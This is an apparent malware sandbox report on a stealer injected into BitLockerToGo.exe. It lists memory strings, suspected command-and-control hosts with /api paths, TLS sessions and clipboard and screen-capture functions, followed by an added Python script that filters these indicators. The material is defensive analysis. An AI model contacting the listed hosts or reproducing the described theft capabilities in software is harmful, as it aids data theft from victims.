                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.co
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/k
                    Source: BitLockerToGo.exe, 00000001.00000003.1944436767.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/l
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: BitLockerToGo.exe, 00000001.00000003.1964000369.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/
                    Source: BitLockerToGo.exe, 00000001.00000003.1964000369.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/apii
                    Source: BitLockerToGo.exe, 00000001.00000003.1964000369.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/k
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/U
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiS
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apie
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/r
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F765611997
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steamp
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampo
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009829565.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000002.2029983019.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/st
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016710572.0000000000649000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016726223.0000000000648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag-s
                    Source: BitLockerToGo.exe, 00000001.00000003.2016662857.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2016662857.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49745 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 1_2_00436E30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 1_2_00436E30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 1_2_00436FC0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, | 1_2_00436FC0
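The string, network and code-function rows above are the raw material an analyst turns into indicators, and most of them are noise: the sample ran inside BitLockerToGo.exe, fetched a Steam Community profile page, and left that page's Akamai, Cloudflare and reCAPTCHA references in memory next to the hosts that actually matter. The script below is an added example, not part of the Joe Sandbox report. It parses a handful of rows copied from this page (kept in the collapsed one-cell-per-line form the page shows), extracts the hostnames found in memory, filters them against an allowlist of Steam, Valve, Akamai, Cloudflare and Google hosts, pairs each TLS session with its client port so that ports with no recorded handshake stand out, and tags the two code functions by the API sequences the report lists. The allowlist, the capability tags and the "candidate C2" label are assumptions of this example; which hosts are the real C2 is stated by the report's own "C2 URLs / IPs found in malware configuration" verdict, not by this filter.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: rows copied from this report, kept in the collapsed form the
# rendered page shows (the Source / description cell boundary is missing, so the
# memory region name runs straight into "String found in binary or memory:").
SAMPLE_LINES = [
    "Source: BitLockerToGo.exe, 00000001.00000003.2009765757.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english",
    "Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges",
    "Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn",
    "Source: BitLockerToGo.exe, 00000001.00000003.1944436767.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api",
    "Source: BitLockerToGo.exe, 00000001.00000003.1964000369.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/apii",
    "Source: BitLockerToGo.exe, 00000001.00000002.2029983019.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api",
    "Source: BitLockerToGo.exe, 00000001.00000003.2009765757.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743",
    "Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49745 version: TLS 1.2",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00436E30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00436E30",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00436FC0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,1_2_00436FC0",
    r"Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043C27A1_2_0043C27A",
]

STRING_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
HTTPS_RE = re.compile(r"HTTPS traffic detected: (\d+\.\d+\.\d+\.\d+):(\d+) -> "
                      r"(\d+\.\d+\.\d+\.\d+):(\d+) version: (TLS [\d.]+)")
PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
# The report repeats the function id as a trailing column; it is dropped from the
# API list below, so the collapsed and the separated layouts parse the same way.
FUNC_RE = re.compile(r"Code function: (?P<fn>\d+_\d+_[0-9A-F]{8}) ?(?P<apis>[A-Za-z0-9_,]*)")

# Assumption of this example: hosts the decoy Steam profile page legitimately
# references. Anything else found in memory is reported as a candidate only.
BENIGN_SUFFIXES = ("steamstatic.com", "steampowered.com", "steamcommunity.com", "steam.tv",
                   "valvesoftware.com", "akamaized.net", "cloudflare.com", "google.com",
                   "gstatic.com", "gstatic.cn", "recaptcha.net", "youtube.com", "ytimg.com",
                   "vimeo.com", "medal.tv", "sketchfab.com")
# Assumption of this example: API sets that mirror the report's own signature
# names for clipboard reading and screenshot capture.
CAPABILITIES = {
    "clipboard read": {"OpenClipboard", "GetClipboardData"},
    "screen capture": {"CreateCompatibleBitmap", "BitBlt"},
}


def is_benign(host):
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def parse_report(lines):
    """Turn report rows into hosts, candidate C2 hosts, TLS sessions and tagged functions."""
    hosts = defaultdict(set)   # hostname -> paths seen in memory
    sessions = {}              # client port -> (remote ip, remote port, TLS version)
    client_ports = set()       # client ports named in the "HTTP traffic on port" rows
    functions = {}             # function id -> capability tags
    for line in lines:
        if m := STRING_RE.search(line):
            url = urlsplit(m.group(1).rstrip(";"))   # memory fragments may carry a trailing ';'
            if url.hostname:
                hosts[url.hostname].add(url.path or "/")
        elif m := HTTPS_RE.search(line):
            rip, rport, _cip, cport, ver = m.groups()
            sessions[int(cport)] = (rip, int(rport), ver)
        elif m := PORT_RE.search(line):
            a, b = int(m.group(1)), int(m.group(2))
            client_ports.add(a if b == 443 else b)    # the non-443 side is the client port
        elif m := FUNC_RE.search(line):
            fn = m.group("fn")
            apis = {a for a in m.group("apis").split(",") if a and a != fn}
            functions[fn] = sorted(tag for tag, need in CAPABILITIES.items() if need <= apis)
    return {
        "hosts": {h: sorted(p) for h, p in hosts.items()},
        "candidate_c2": {h: sorted(p) for h, p in hosts.items() if not is_benign(h)},
        "sessions": sessions,
        # ports that appear in the HTTP rows but have no TLS handshake row
        "unmatched_ports": sorted(client_ports - set(sessions)),
        "functions": functions,
    }


if __name__ == "__main__":
    result = parse_report(SAMPLE_LINES)
    for host, paths in sorted(result["candidate_c2"].items()):
        print(f"candidate C2 host {host}: {' '.join(paths)}")
    for port, (ip, rport, ver) in sorted(result["sessions"].items()):
        print(f"client port {port} -> {ip}:{rport} ({ver})")
    print("client ports with no TLS handshake recorded:", result["unmatched_ports"])
    for fn, tags in sorted(result["functions"].items()):
        print(f"{fn}: {', '.join(tags) or 'no tagged capability'}")
```

On the rows above the filter leaves lv.queniujq.cn, mathcucom.sbs, resinedyw.sbs and sergei-esenin.com, which are also the only hosts whose in-memory paths look like an API endpoint rather than a page asset. The port pairing shows that client port 49743 has HTTP rows but no HTTPS handshake row in this section, which is worth checking against the PCAP before treating that connection as a failed or non-TLS contact. The same regexes work on the full report export once the rows are read from a file instead of the embedded sample.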

                    System Summary

                    Source: 00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0043C27A1_2_0043C27A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0040F3401_2_0040F340
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00410CE0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00423050
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00427064
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00401000
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042C000
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040B010
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00441010
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00446030
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00430170
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042E108
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00445190
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0043A24C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042B2D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040135C
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00430300
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00401311
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00446310
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0041E330
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040D3D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004433BA
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0041D440
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0041243E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004014C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0040A4F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004444A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0042E4B2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_004165C2
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0043B5A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00403660
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_00446600
